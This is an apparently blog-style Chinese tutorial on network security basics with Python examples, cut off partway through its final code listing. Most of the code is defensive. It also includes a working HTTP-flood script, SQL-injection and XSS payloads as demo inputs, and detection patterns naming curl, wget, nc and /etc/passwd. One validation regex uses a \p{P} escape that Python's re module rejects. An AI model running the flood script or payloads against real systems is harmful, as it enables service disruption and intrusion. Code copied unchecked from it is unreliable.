『宝藏代码胶囊开张啦!』—— 我的 CodeCapsule 来咯!✨写代码不再头疼!我的新站点 CodeCapsule 主打一个 “白菜价”+“量身定制”!无论是卡脖子的毕设/课设/文献复现,需要灵光一现的算法改进,还是想给项目加个“外挂”,这里都有便宜又好用的代码方案等你发现!低成本,高适配,助你轻松通关!速来围观 👉 CodeCapsule官网

网络安全基础与常见攻击防护

1. 引言

在数字化时代,网络安全已成为个人、企业和政府机构关注的焦点。随着网络技术的飞速发展,网络攻击手段也日益复杂多样。据Cybersecurity Ventures报告,到2025年,全球网络犯罪造成的损失预计将达到10.5万亿美元,这凸显了网络安全防护的重要性。

网络安全不仅仅是技术问题,更是一个涉及技术、管理和法律的综合性挑战。本文将从基础概念入手,深入探讨常见的网络攻击类型及其防护策略,并提供实用的Python代码示例,帮助读者更好地理解和实施网络安全防护措施。

2. 网络安全基础概念

2.1 网络安全定义与目标

网络安全是指保护网络系统及其数据免受未经授权的访问、使用、泄露、破坏、修改或中断的措施和实践。其核心目标通常被称为CIA三元组

  • 机密性(Confidentiality):确保信息不被未授权个体访问
  • 完整性(Integrity):保证信息在传输和存储过程中不被篡改
  • 可用性(Availability):确保授权用户在需要时可以访问信息和资源

2.2 常见安全威胁分类

根据攻击方式和目标,网络安全威胁可分为以下几类:

网络安全威胁
主动攻击
被动攻击
拒绝服务攻击
中间人攻击
恶意软件
流量分析
窃听
DDoS攻击
SYN洪水攻击
病毒
蠕虫
特洛伊木马
勒索软件

2.3 安全防护的基本原则

  1. 最小权限原则:用户和程序只应拥有完成其任务所必需的最小权限
  2. 深度防御:采用多层安全措施,确保一层被突破后还有其他防护
  3. 默认安全配置:系统默认配置应是最安全的配置
  4. 安全开发生命周期:在软件开发的所有阶段集成安全考虑

3. 常见网络攻击类型与原理

3.1 拒绝服务攻击(DoS/DDoS)

拒绝服务攻击旨在使目标系统无法提供正常服务。最常见的类型包括:

3.1.1 SYN洪水攻击

SYN洪水攻击利用TCP三次握手的缺陷:

  1. 攻击者发送大量SYN包到目标服务器
  2. 服务器回应SYN-ACK包并等待客户端ACK
  3. 攻击者不发送ACK,导致服务器资源耗尽

攻击原理可用以下公式表示:
R a t t a c k > R m a x − R l e g i t i m a t e R_{attack} > R_{max} - R_{legitimate} Rattack>RmaxRlegitimate
其中:

  • R a t t a c k R_{attack} Rattack 是攻击流量速率
  • R m a x R_{max} Rmax 是服务器最大处理能力
  • R l e g i t i m a t e R_{legitimate} Rlegitimate 是合法流量速率
3.1.2 应用层DDoS攻击

这种攻击针对特定应用服务,如HTTP洪水攻击:

import socket
import random
import threading
import time

def simulate_http_flood(target_ip, target_port, num_requests):
    """
    模拟HTTP洪水攻击(仅用于教育目的)
    
    参数:
        target_ip: 目标IP地址
        target_port: 目标端口
        num_requests: 请求数量
    """
    user_agents = [
        "Mozilla/5.0 (Windows NT 10.0; Win64; x64)",
        "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7)",
        "Mozilla/5.0 (X11; Linux x86_64)"
    ]
    
    for i in range(num_requests):
        try:
            # 创建socket连接
            s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
            s.settimeout(2)
            s.connect((target_ip, target_port))
            
            # 构造HTTP请求
            http_request = (
                f"GET / HTTP/1.1\r\n"
                f"Host: {target_ip}\r\n"
                f"User-Agent: {random.choice(user_agents)}\r\n"
                f"Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n"
                f"Connection: keep-alive\r\n\r\n"
            )
            
            s.send(http_request.encode())
            # 不读取响应,节省资源
            s.close()
            
            if i % 100 == 0:
                print(f"已发送 {i} 个请求")
                
            time.sleep(0.01)  # 避免过快发送
            
        except Exception as e:
            print(f"请求失败: {e}")
            continue

# 注意:此代码仅用于演示攻击原理,请勿用于非法用途

3.2 中间人攻击(MITM)

中间人攻击是指攻击者秘密地插入到两个通信方之间,拦截、修改或注入通信数据。

客户端 攻击者 服务器 发送数据(以为发送给B) 攻击者截获数据 转发修改后的数据 返回响应 攻击者截获响应 返回修改后的响应 客户端 攻击者 服务器
3.2.1 ARP欺骗攻击

ARP欺骗是实施MITM攻击的常见手段:

import scapy.all as scapy
import time
import sys

class ARPSpoofer:
    """
    ARP欺骗检测与防护演示类
    """
    
    def __init__(self):
        self.arp_table = {}
        
    def get_mac(self, ip):
        """
        获取IP地址对应的MAC地址
        
        参数:
            ip: 目标IP地址
            
        返回:
            MAC地址字符串
        """
        arp_request = scapy.ARP(pdst=ip)
        broadcast = scapy.Ether(dst="ff:ff:ff:ff:ff:ff")
        arp_request_broadcast = broadcast / arp_request
        answered_list = scapy.srp(arp_request_broadcast, timeout=1, verbose=False)[0]
        
        if answered_list:
            return answered_list[0][1].hwsrc
        return None
    
    def detect_arp_spoofing(self, target_ip, gateway_ip, interval=5):
        """
        检测ARP欺骗攻击
        
        参数:
            target_ip: 监控的目标IP
            gateway_ip: 网关IP
            interval: 检测间隔(秒)
        """
        print(f"开始ARP欺骗检测...")
        print(f"目标IP: {target_ip}")
        print(f"网关IP: {gateway_ip}")
        print("-" * 50)
        
        target_mac = self.get_mac(target_ip)
        gateway_mac = self.get_mac(gateway_ip)
        
        if not target_mac or not gateway_mac:
            print("无法获取MAC地址,请检查网络连接")
            return
        
        print(f"初始MAC地址:")
        print(f"目标 {target_ip} -> {target_mac}")
        print(f"网关 {gateway_ip} -> {gateway_mac}")
        
        try:
            while True:
                time.sleep(interval)
                
                current_target_mac = self.get_mac(target_ip)
                current_gateway_mac = self.get_mac(gateway_ip)
                
                if current_target_mac != target_mac:
                    print(f"[警告] 检测到ARP欺骗! {target_ip} 的MAC地址已改变")
                    print(f"原MAC: {target_mac}")
                    print(f"现MAC: {current_target_mac}")
                    
                if current_gateway_mac != gateway_mac:
                    print(f"[警告] 检测到ARP欺骗! {gateway_ip} 的MAC地址已改变")
                    print(f"原MAC: {gateway_mac}")
                    print(f"现MAC: {current_gateway_mac}")
                    
        except KeyboardInterrupt:
            print("\n检测已停止")
    
    def restore_arp(self, destination_ip, source_ip):
        """
        恢复ARP表(用于演示防护)
        
        参数:
            destination_ip: 目标IP
            source_ip: 源IP
        """
        destination_mac = self.get_mac(destination_ip)
        source_mac = self.get_mac(source_ip)
        
        if not destination_mac or not source_mac:
            print("无法获取MAC地址")
            return
        
        # 创建正确的ARP响应包
        packet = scapy.ARP(
            op=2,  # ARP响应
            pdst=destination_ip,
            hwdst=destination_mac,
            psrc=source_ip,
            hwsrc=source_mac
        )
        
        scapy.send(packet, count=4, verbose=False)
        print(f"已恢复 {destination_ip} 的ARP表项")

# 使用示例
if __name__ == "__main__":
    # 注意:在实际环境中使用时需要适当权限
    spoofer = ARPSpoofer()
    
    # 示例:检测本地网络中的ARP欺骗
    # 请替换为实际IP地址
    # spoofer.detect_arp_spoofing("192.168.1.100", "192.168.1.1")

3.3 SQL注入攻击

SQL注入是最常见的Web应用安全漏洞之一,攻击者通过在输入字段中插入SQL代码来操纵数据库查询。

3.3.1 SQL注入原理

考虑一个简单的登录查询:

SELECT * FROM users WHERE username = '$username' AND password = '$password'

如果攻击者输入:

  • 用户名:admin' --
  • 密码:任意值

则查询变为:

SELECT * FROM users WHERE username = 'admin' -- ' AND password = '任意值'

-- 是SQL注释符,使得后面的条件被忽略,从而绕过密码验证。

3.3.2 SQL注入防护演示
import sqlite3
import re
from typing import Optional, List, Tuple

class SQLInjectionDemo:
    """
    SQL注入攻击与防护演示类
    """
    
    def __init__(self, db_name=":memory:"):
        """
        初始化数据库和示例数据
        
        参数:
            db_name: 数据库名称,默认使用内存数据库
        """
        self.conn = sqlite3.connect(db_name)
        self.cursor = self.conn.cursor()
        self.setup_database()
    
    def setup_database(self):
        """创建示例数据库表并插入测试数据"""
        # 创建用户表
        self.cursor.execute('''
            CREATE TABLE IF NOT EXISTS users (
                id INTEGER PRIMARY KEY,
                username TEXT NOT NULL UNIQUE,
                password TEXT NOT NULL,
                email TEXT,
                is_admin INTEGER DEFAULT 0
            )
        ''')
        
        # 插入测试数据
        test_users = [
            (1, 'admin', 'admin123', 'admin@example.com', 1),
            (2, 'alice', 'alicepass', 'alice@example.com', 0),
            (3, 'bob', 'bobpassword', 'bob@example.com', 0),
            (4, 'test', 'test123', 'test@example.com', 0)
        ]
        
        self.cursor.executemany(
            'INSERT OR REPLACE INTO users VALUES (?, ?, ?, ?, ?)',
            test_users
        )
        
        self.conn.commit()
    
    def vulnerable_login(self, username: str, password: str) -> Optional[dict]:
        """
        存在SQL注入漏洞的登录函数
        
        参数:
            username: 用户名
            password: 密码
            
        返回:
            用户信息字典或None
        """
        # 危险:直接拼接SQL查询
        query = f"SELECT * FROM users WHERE username = '{username}' AND password = '{password}'"
        
        try:
            self.cursor.execute(query)
            user = self.cursor.fetchone()
            
            if user:
                return {
                    'id': user[0],
                    'username': user[1],
                    'email': user[3],
                    'is_admin': bool(user[4])
                }
        except Exception as e:
            print(f"查询错误: {e}")
            
        return None
    
    def safe_login(self, username: str, password: str) -> Optional[dict]:
        """
        安全的登录函数(使用参数化查询)
        
        参数:
            username: 用户名
            password: 密码
            
        返回:
            用户信息字典或None
        """
        # 安全:使用参数化查询
        query = "SELECT * FROM users WHERE username = ? AND password = ?"
        
        try:
            self.cursor.execute(query, (username, password))
            user = self.cursor.fetchone()
            
            if user:
                return {
                    'id': user[0],
                    'username': user[1],
                    'email': user[3],
                    'is_admin': bool(user[4])
                }
        except Exception as e:
            print(f"查询错误: {e}")
            
        return None
    
    def sanitize_input(self, input_str: str) -> str:
        """
        输入清理函数(辅助防护措施)
        
        参数:
            input_str: 输入字符串
            
        返回:
            清理后的字符串
        """
        # 移除SQL关键字(简单示例,实际需要更复杂的处理)
        sql_keywords = ['SELECT', 'INSERT', 'UPDATE', 'DELETE', 'DROP', 
                       'UNION', 'OR', 'AND', '--', '/*', '*/']
        
        sanitized = input_str
        for keyword in sql_keywords:
            # 不区分大小写替换
            sanitized = re.sub(re.escape(keyword), '', sanitized, flags=re.IGNORECASE)
        
        # 限制长度
        if len(sanitized) > 100:
            sanitized = sanitized[:100]
            
        return sanitized
    
    def detect_sql_injection(self, input_str: str) -> bool:
        """
        检测SQL注入尝试
        
        参数:
            input_str: 输入字符串
            
        返回:
            是否检测到SQL注入特征
        """
        # SQL注入常见特征模式
        patterns = [
            r"'.*--",           # 单引号后跟注释
            r"'.*OR.*=.*",      # OR条件绕过
            r"'.*UNION.*SELECT", # UNION注入
            r"'.*DROP.*",       # DROP语句
            r"'.*;.*",          # 多语句执行
            r"\bOR\b.*\bOR\b",  # 多个OR
            r"\bAND\b.*\bAND\b", # 多个AND
        ]
        
        for pattern in patterns:
            if re.search(pattern, input_str, re.IGNORECASE):
                return True
                
        return False
    
    def demonstrate_injection(self):
        """演示SQL注入攻击"""
        print("=" * 60)
        print("SQL注入攻击演示")
        print("=" * 60)
        
        # 正常登录
        print("\n1. 正常登录尝试:")
        result = self.vulnerable_login("alice", "alicepass")
        print(f"结果: {'成功' if result else '失败'}")
        
        # SQL注入攻击
        print("\n2. SQL注入攻击(绕过密码):")
        malicious_username = "admin' -- "
        malicious_password = "anything"
        
        print(f"用户名: {malicious_username}")
        print(f"密码: {malicious_password}")
        
        result = self.vulnerable_login(malicious_username, malicious_password)
        if result:
            print(f"攻击成功!以管理员身份登录")
            print(f"用户信息: {result}")
        else:
            print("攻击失败")
        
        # 使用安全方法
        print("\n3. 使用参数化查询防护:")
        result = self.safe_login(malicious_username, malicious_password)
        print(f"安全登录结果: {'成功' if result else '失败'}")
        
        # 检测SQL注入
        print("\n4. SQL注入检测:")
        test_inputs = [
            "admin",
            "admin' OR '1'='1",
            "test'; DROP TABLE users; --",
            "admin' UNION SELECT * FROM users --"
        ]
        
        for test_input in test_inputs:
            is_malicious = self.detect_sql_injection(test_input)
            print(f"输入: '{test_input}' -> {'疑似SQL注入' if is_malicious else '安全'}")
    
    def close(self):
        """关闭数据库连接"""
        self.conn.close()

# 运行演示
if __name__ == "__main__":
    demo = SQLInjectionDemo()
    demo.demonstrate_injection()
    demo.close()

3.4 跨站脚本攻击(XSS)

XSS攻击允许攻击者将恶意脚本注入到其他用户浏览的网页中。

3.4.1 XSS类型
  1. 反射型XSS:恶意脚本来自当前HTTP请求
  2. 存储型XSS:恶意脚本存储在服务器上
  3. DOM型XSS:通过修改DOM环境而不是插入HTML
3.4.2 XSS防护示例
import html
import re
from urllib.parse import quote, unquote

class XSSProtection:
    """
    XSS攻击防护类
    """
    
    @staticmethod
    def html_escape(text: str) -> str:
        """
        HTML转义,防止XSS攻击
        
        参数:
            text: 需要转义的文本
            
        返回:
            转义后的文本
        """
        if not text:
            return ""
        
        # 使用Python内置的html.escape
        escaped = html.escape(text)
        return escaped
    
    @staticmethod
    def sanitize_html(html_content: str, allowed_tags=None) -> str:
        """
        HTML清理,只允许特定标签
        
        参数:
            html_content: HTML内容
            allowed_tags: 允许的标签列表
            
        返回:
            清理后的HTML
        """
        if allowed_tags is None:
            allowed_tags = ['b', 'i', 'u', 'p', 'br', 'strong', 'em']
        
        # 移除script标签
        html_content = re.sub(r'<script.*?>.*?</script>', '', html_content, flags=re.IGNORECASE | re.DOTALL)
        
        # 移除on事件属性
        html_content = re.sub(r'on\w+\s*=\s*["\'][^"\']*["\']', '', html_content, flags=re.IGNORECASE)
        
        # 移除javascript:协议
        html_content = re.sub(r'href\s*=\s*["\']javascript:[^"\']*["\']', 'href="#"', html_content, flags=re.IGNORECASE)
        
        # 白名单过滤标签
        pattern = r'</?(?!' + '|'.join(allowed_tags) + r')\b[^>]*>'
        html_content = re.sub(pattern, '', html_content, flags=re.IGNORECASE)
        
        return html_content
    
    @staticmethod
    def validate_input(input_str: str, max_length=1000, pattern=None) -> bool:
        """
        输入验证
        
        参数:
            input_str: 输入字符串
            max_length: 最大长度限制
            pattern: 验证正则表达式
            
        返回:
            验证是否通过
        """
        if not input_str:
            return False
        
        # 长度检查
        if len(input_str) > max_length:
            return False
        
        # 字符集检查(只允许常见字符)
        if not re.match(r'^[\w\s\p{P}]*$', input_str, re.UNICODE):
            return False
        
        # 自定义模式检查
        if pattern and not re.match(pattern, input_str):
            return False
        
        return True
    
    @staticmethod
    def set_security_headers(headers: dict) -> dict:
        """
        设置安全HTTP头部
        
        参数:
            headers: 原始HTTP头部
            
        返回:
            增强安全性的HTTP头部
        """
        security_headers = {
            'X-Content-Type-Options': 'nosniff',
            'X-Frame-Options': 'DENY',
            'X-XSS-Protection': '1; mode=block',
            'Content-Security-Policy': "default-src 'self'; script-src 'self'",
            'Strict-Transport-Security': 'max-age=31536000; includeSubDomains'
        }
        
        headers.update(security_headers)
        return headers
    
    def demonstrate_xss_protection(self):
        """演示XSS防护"""
        print("=" * 60)
        print("XSS攻击防护演示")
        print("=" * 60)
        
        test_cases = [
            ("正常输入", "Hello, World!"),
            ("脚本攻击", "<script>alert('XSS')</script>"),
            ("事件处理器", "<img src='x' onerror='alert(1)'>"),
            ("JavaScript协议", "<a href='javascript:alert(1)'>点击</a>"),
            ("混合攻击", "Hello<script>evil()</script>World")
        ]
        
        for name, test_input in test_cases:
            print(f"\n测试: {name}")
            print(f"原始输入: {test_input}")
            
            # HTML转义
            escaped = self.html_escape(test_input)
            print(f"HTML转义后: {escaped}")
            
            # HTML清理
            sanitized = self.sanitize_html(test_input)
            print(f"HTML清理后: {sanitized}")
            
            # 输入验证
            is_valid = self.validate_input(test_input)
            print(f"输入验证: {'通过' if is_valid else '失败'}")

# 使用示例
if __name__ == "__main__":
    xss_protection = XSSProtection()
    xss_protection.demonstrate_xss_protection()

4. 综合防护系统设计

4.1 多层防御架构

一个完整的网络安全防护系统应采用多层防御策略:

graph TB
    subgraph "多层防御体系"
        A[网络层防护] --> B[主机层防护]
        B --> C[应用层防护]
        C --> D[数据层防护]
    end
    
    subgraph A
        A1[防火墙]
        A2[入侵检测系统]
        A3[DDoS防护]
    end
    
    subgraph B
        B1[主机防火墙]
        B2[防病毒软件]
        B3[系统加固]
    end
    
    subgraph C
        C1[WAF]
        C2[输入验证]
        C3[会话管理]
    end
    
    subgraph D
        D1[加密存储]
        D2[访问控制]
        D3[数据脱敏]
    end

4.2 完整的网络安全监控系统

import logging
import json
import time
from datetime import datetime
from typing import Dict, List, Optional, Any
import hashlib
import hmac
import base64
from collections import defaultdict

class SecurityMonitor:
    """
    网络安全监控系统
    """
    
    def __init__(self, config_file="security_config.json"):
        """
        初始化安全监控系统
        
        参数:
            config_file: 配置文件路径
        """
        self.config = self.load_config(config_file)
        self.logger = self.setup_logger()
        self.attack_patterns = self.load_attack_patterns()
        self.suspicious_activities = defaultdict(list)
        
        # 初始化计数器
        self.counters = {
            "total_requests": 0,
            "blocked_requests": 0,
            "sql_injection_attempts": 0,
            "xss_attempts": 0,
            "brute_force_attempts": 0
        }
    
    def load_config(self, config_file: str) -> Dict[str, Any]:
        """
        加载配置文件
        
        参数:
            config_file: 配置文件路径
            
        返回:
            配置字典
        """
        default_config = {
            "thresholds": {
                "max_login_attempts": 5,
                "max_request_rate": 100,  # 请求/分钟
                "sql_injection_score": 0.8,
                "xss_score": 0.7
            },
            "monitoring": {
                "enable_sql_injection_detection": True,
                "enable_xss_detection": True,
                "enable_brute_force_detection": True,
                "enable_ddos_detection": True
            },
            "alerting": {
                "email_alerts": False,
                "sms_alerts": False,
                "webhook_url": None
            }
        }
        
        try:
            with open(config_file, 'r') as f:
                user_config = json.load(f)
                default_config.update(user_config)
        except FileNotFoundError:
            self.log_message("warning", f"配置文件 {config_file} 未找到,使用默认配置")
        except json.JSONDecodeError as e:
            self.log_message("error", f"配置文件解析错误: {e}")
        
        return default_config
    
    def setup_logger(self):
        """
        设置日志系统
        
        返回:
            logger对象
        """
        logger = logging.getLogger("SecurityMonitor")
        logger.setLevel(logging.INFO)
        
        # 文件处理器
        file_handler = logging.FileHandler('security_monitor.log')
        file_handler.setLevel(logging.INFO)
        
        # 控制台处理器
        console_handler = logging.StreamHandler()
        console_handler.setLevel(logging.WARNING)
        
        # 格式器
        formatter = logging.Formatter(
            '%(asctime)s - %(name)s - %(levelname)s - %(message)s'
        )
        file_handler.setFormatter(formatter)
        console_handler.setFormatter(formatter)
        
        logger.addHandler(file_handler)
        logger.addHandler(console_handler)
        
        return logger
    
    def load_attack_patterns(self) -> Dict[str, List[str]]:
        """
        加载攻击模式数据库
        
        返回:
            攻击模式字典
        """
        patterns = {
            "sql_injection": [
                r"'.*--",
                r"'.*OR.*=.*",
                r"'.*UNION.*SELECT",
                r"'.*DROP.*",
                r"'.*;.*",
                r"\b(SELECT|INSERT|UPDATE|DELETE|DROP)\b.*\b(FROM|INTO|TABLE)\b",
                r"\b(EXEC|EXECUTE|DECLARE)\b"
            ],
            "xss": [
                r"<script.*?>.*?</script>",
                r"on\w+\s*=\s*['\"][^'\"]*['\"]",
                r"javascript:\s*[^'\"]*",
                r"eval\s*\([^)]*\)",
                r"alert\s*\([^)]*\)"
            ],
            "path_traversal": [
                r"\.\./",
                r"\.\.\\",
                r"/etc/passwd",
                r"C:\\Windows\\"
            ],
            "command_injection": [
                r"[;&|`]\s*\b(ls|cat|rm|wget|curl|nc|python|perl)\b",
                r"\$\{[^}]*\}",
                r"\(\s*[^)]*\)"
            ]
        }
        
        return patterns
    
    def analyze_request(self, request_data: Dict[str, Any]) -> Dict[str, Any]:
        """
        分析HTTP请求的安全性
        
        参数:
            request_data: 请求数据
            
        返回:
            分析结果
        """
        self.counters["total_requests"] += 1
        
        analysis_result = {
            "is_malicious": False,
            "threats": [],
            "risk_score": 0.0,
            "recommendation": "allow"
        }
        
        # 检查SQL注入
        if self.config["monitoring"]["enable_sql_injection_detection"]:
            sql_score = self.check_sql_injection(request_data)
            if sql_score > self.config["thresholds"]["sql_injection_score"]:
                analysis_result["is_malicious"] = True
                analysis_result["threats"].append("sql_injection")
                analysis_result["risk_score"] = max(analysis_result["risk_score"], sql_score)
                self.counters["sql_injection_attempts"] += 1
        
        # 检查XSS
        if self.config["monitoring"]["enable_xss_detection"]:
            xss_score = self.check_xss(request_data)
            if xss_score > self.config["thresholds"]["xss_score"]:
                analysis_result["is_malicious"] = True
                analysis_result["threats"].append("xss")
                analysis_result["risk_score"] = max(analysis_result["risk_score"], xss_score)
                self.counters["xss_attempts"] += 1
        
        # 检查暴力破解
        if self.config["monitoring"]["enable_brute_force_detection"]:
            if self.check_brute_force(request_data):
                analysis_result["is_malicious"] = True
                analysis_result["threats"].append("brute_force")
                analysis_result["risk_score"] = max(analysis_result["risk_score"], 0.9)
                self.counters["brute_force_attempts"] += 1
        
        # 生成建议
        if analysis_result["is_malicious"]:
            analysis_result["recommendation"] = "block"
            self.counters["blocked_requests"] += 1
            self.log_attack(request_data, analysis_result)
        
        return analysis_result
    
    def check_sql_injection(self, request_data: Dict[str, Any]) -> float:
        """
        检查SQL注入攻击
        
        参数:
            request_data: 请求数据
            
        返回:
            威胁评分 (0.0-1.0)
        """
        max_score = 0.0
        
        # 检查所有参数
        for param_name, param_value in request_data.get("params", {}).items():
            if not isinstance(param_value, str):
                continue
            
            param_score = 0.0
            
            # 检查攻击模式
            for pattern in self.attack_patterns["sql_injection"]:
                if re.search(pattern, param_value, re.IGNORECASE):
                    param_score = max(param_score, 0.7)
            
            # 检查特殊字符
            suspicious_chars = ["'", "\"", ";", "--", "/*", "*/"]
            char_count = sum(param_value.count(char) for char in suspicious_chars)
            if char_count > 2:
                param_score = max(param_score, min(0.3 + char_count * 0.1, 1.0))
            
            max_score = max(max_score, param_score)
        
        return max_score
    
    def check_xss(self, request_data: Dict[str, Any]) -> float:
        """
        检查XSS攻击
        
        参数:
            request_data: 请求数据
            
        返回:
            威胁评分 (0.0-1.0)
        """
        max_score = 0.0
        
        for param_name, param_value in request_data.get("params", {}).items():
            if not isinstance(param_value, str):
                continue
            
            param_score = 0.0
            
            # 检查攻击模式
            for pattern in self.attack_patterns["xss"]:
                if re.search(pattern, param_value, re.IGNORECASE):
                    param_score = max(param_score, 0.8)
            
            # 检查HTML标签
            if re.search(r"<[^>]*>", param_value):
                param_score = max(param_score, 0.5)
            
            max_score = max(max_score, param_score)
        
        return max_score
    
    def check_brute_force(self, request_data: Dict[str, Any]) -> bool:
        """
        检查暴力破解攻击
        
        参数:
            request_data: 请求数据
            
        返回:
            是否检测到暴力破解
        """
        client_ip = request_data.get("client_ip")
        path = request_data.get("path", "")
        
        # 如果是登录请求
        if "/login" in path or "/auth" in path:
            if client_ip:
                # 记录登录尝试
                self.suspicious_activities[client_ip].append(datetime.now())
                
                # 清理过期的记录(5分钟内)
                five_minutes_ago = datetime.now().timestamp() - 300
                self.suspicious_activities[client_ip] = [
                    t for t in self.suspicious_activities[client_ip]
                    if t.timestamp() > five_minutes_ago
                ]
                
                # 检查尝试次数
                if len(self.suspicious_activities[client_ip]) > \
                   self.config["thresholds"]["max_login_attempts"]:
                    self.log_message(
                        "warning",
                        f"检测到暴力破解尝试: IP={client_ip}, "
                        f"尝试次数={len(self.suspicious_activities[client_ip])}"
                    )
                    return True
        
        return False
    
    def log_message(self, level: str, message: str):
        """
        记录日志消息
        
        参数:
            level: 日志级别
            message: 日志消息
        """
        log_method = getattr(self.logger, level.lower(), self.logger.info)
        log_method(message)
    
    def log_attack(self, request_data: Dict[str, Any], analysis_result: Dict[str, Any]):
        """
        记录攻击事件
        
        参数:
            request_data: 请求数据
            analysis_result: 分析结果
        """
        attack_log = {
            "timestamp": datetime.now().isoformat(),
            "client_ip": request_data.get("client_ip", "unknown"),
            "method": request_data.get("method", "unknown"),
            "path": request_data.get("path", "unknown"),
            "threats": analysis_result["threats"],
            "risk_score": analysis_result["risk_score"],
            "params": request_data.get("params", {})
        }
        
        self.log_message(
            "warning",
            f"检测到恶意请求: IP={attack_log['client_ip']}, "
            f"威胁={attack_log['threats']}, 风险评分={attack_log['risk_score']}"
        )
        
        # 保存到文件
        with open("attack_log.jsonl", "a") as f:
            f.write(json.dumps(attack_log) + "\n")
    
    def generate_report(self) -> Dict[str, Any]:
        """
        生成安全报告
        
        返回:
            报告字典
        """
        report = {
            "timestamp": datetime.now().isoformat(),
            "summary": {
                "total_requests": self.counters["total_requests"],
                "blocked_requests": self.counters["blocked_requests"],
                "block_rate": (
                    self.counters["blocked_requests"] / self.counters["total_requests"]
                    if self.counters["total_requests"] > 0 else 0
                ),
                "threats_detected": {
                    "sql_injection": self.counters["sql_injection_attempts"],
                    "xss": self.counters["xss_attempts"],
                    "brute_force": self.counters["brute_force_attempts"]
                }
            },
            "recommendations": []
        }
        
        # 生成建议
        if self.counters["sql_injection_attempts"] > 10:
            report["recommendations"].append(
                "检测到大量SQL注入尝试,建议加强输入验证和参数化查询"
            )
        
        if self.counters["xss_attempts"] > 10:
            report["recommendations"].append(
                "检测到大量XSS尝试,建议实施更严格的输出编码和CSP策略"
            )
        
        if report["summary"]["block_rate"] > 0.1:
            report["recommendations"].append(
                "请求阻断率较高,建议检查是否误报或调整检测阈值"
            )
        
        return report
    
    def cleanup(self):
        """清理资源"""
        self.log_message("info", "安全监控系统关闭")
        logging.shutdown()

# 使用示例
if __name__ == "__main__":
    # 创建监控系统实例
    monitor = SecurityMonitor()
    
    # 模拟一些请求
    test_requests = [
        {
            "client_ip": "192.168.1.100",
            "method": "GET",
            "path": "/index.html",
            "params": {"name": "test"}
        },
        {
            "client_ip": "10.0.0.1",
            "method": "POST",
            "path": "/login",
            "params": {
                "username": "admin' -- ",
                "password": "anything"
            }
        },
        {
            "client_ip": "10.0.0.2",
            "method": "GET",
            "path": "/search",
            "params": {"query": "<script>alert(1)</script>"}
        }
    ]
    
    print("开始安全监控测试...")
    print("-" * 60)
    
    for i, request in enumerate(test_requests, 1):
        print(f"\n测试请求 #{i}:")
        print(f"IP: {request['client_ip']}, 路径: {request['path']}")
        
        result = monitor.analyze_request(request)
        
        print(f"分析结果:")
        print(f"  是否恶意: {result['is_malicious']}")
        print(f"  威胁类型: {result['threats']}")
        print(f"  风险评分: {result['risk_score']:.2f}")
        print(f"  建议操作: {result['recommendation']}")
    
    print("\n" + "=" * 60)
    print("生成安全报告:")
    report = monitor.generate_report()
    
    print(f"总请求数: {report['summary']['total_requests']}")
    print(f"阻断请求数: {report['summary']['blocked_requests']}")
    print(f"阻断率: {report['summary']['block_rate']:.2%}")
    print(f"SQL注入尝试: {report['summary']['threats_detected']['sql_injection']}")
    print(f"XSS尝试: {report['summary']['threats_detected']['xss']}")
    
    if report['recommendations']:
        print("\n安全建议:")
        for rec in report['recommendations']:
            print(f"  - {rec}")
    
    # 清理资源
    monitor.cleanup()

5. 完整代码实现与部署

5.1 完整的网络安全防护系统

以下是完整的网络安全防护系统代码,包含了前面讨论的所有功能:

"""
网络安全综合防护系统
版本: 1.0.0
作者: 网络安全团队
描述: 提供SQL注入防护、XSS防护、攻击检测等综合安全功能
"""

import json
import re
import logging
import sqlite3
import hashlib
import html
import time
from datetime import datetime, timedelta
from typing import Dict, List, Optional, Any, Tuple
from collections import defaultdict
from abc import ABC, abstractmethod
import secrets

# ==================== 基础安全工具类 ====================

class SecurityUtils:
    """安全工具类"""
    
    @staticmethod
    def generate_token(length: int = 32) -> str:
        """
        生成安全的随机令牌
        
        参数:
            length: 令牌长度
            
        返回:
            随机令牌字符串
        """
        return secrets.token_hex(length)
    
    @staticmethod
    def hash_password(password: str, salt: Optional[str] = None) -> Tuple[str, str]:
        """
        安全哈希密码
        
        参数:
            password: 原始密码
            salt: 盐值(可选)
            
        返回:
            (哈希密码, 盐值)
        """
        if salt is None:
            salt = secrets.token_hex(16)
        
        # 使用PBKDF2算法
        key = hashlib.pbkdf2_hmac(
            'sha256',
            password.encode('utf-8'),
            salt.encode('utf-8'),
            100000  # 迭代次数
        )
        
        return key.hex(), salt
    
    @staticmethod
    def verify_password(password: str, hashed_password: str, salt: str) -> bool:
        """
        验证密码
        
        参数:
            password: 待验证密码
            hashed_password: 已哈希的密码
            salt: 盐值
            
        返回:
            验证结果
        """
        new_hash, _ = SecurityUtils.hash_password(password, salt)
        return secrets.compare_digest(new_hash, hashed_password)
    
    @staticmethod
    def validate_email(email: str) -> bool:
        """
        验证邮箱格式
        
        参数:
            email: 邮箱地址
            
        返回:
            是否有效
        """
        pattern = r'^[a-zA-Z0-9._%+-]+@[a-zA-Z0-9.-]+\.[a-zA-Z]{2,}$'
        return bool(re.match(pattern, email))
    
    @staticmethod
    def sanitize_filename(filename: str) -> str:
        """
        清理文件名,防止路径遍历
        
        参数:
            filename: 原始文件名
            
        返回:
            安全的文件名
        """
        # 移除目录遍历字符
        filename = re.sub(r'\.\./|\.\.\\', '', filename)
        
        # 只允许字母、数字、下划线、点和连字符
        filename = re.sub(r'[^\w\.\-]', '_', filename)
        
        # 限制长度
        if len(filename) > 255:
            name, ext = filename.rsplit('.', 1)
            filename = name[:250] + '.' + ext
        
        return filename

# ==================== 输入验证类 ====================

class InputValidator:
    """输入验证类"""
    
    def __init__(self):
        self.patterns = {
            'username': r'^[a-zA-Z0-9_]{3,30}$',
            'password': r'^.{8,100}$',  # 密码复杂度在业务逻辑中检查
            'email': r'^[a-zA-Z0-9._%+-]+@[a-zA-Z0-9.-]+\.[a-zA-Z]{2,}$',
            'phone': r'^\+?[1-9]\d{1,14}$',
            'url': r'^https?://[^\s/$.?#].[^\s]*$',
            'ip_address': r'^\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}$'
        }
    
    def validate(self, field_type: str, value: str, 
                custom_pattern: Optional[str] = None) -> Tuple[bool, str]:
        """
        验证输入字段
        
        参数:
            field_type: 字段类型
            value: 字段值
            custom_pattern: 自定义正则表达式
            
        返回:
            (是否有效, 错误信息)
        """
        if not isinstance(value, str):
            return False, "值必须是字符串"
        
        # 检查长度
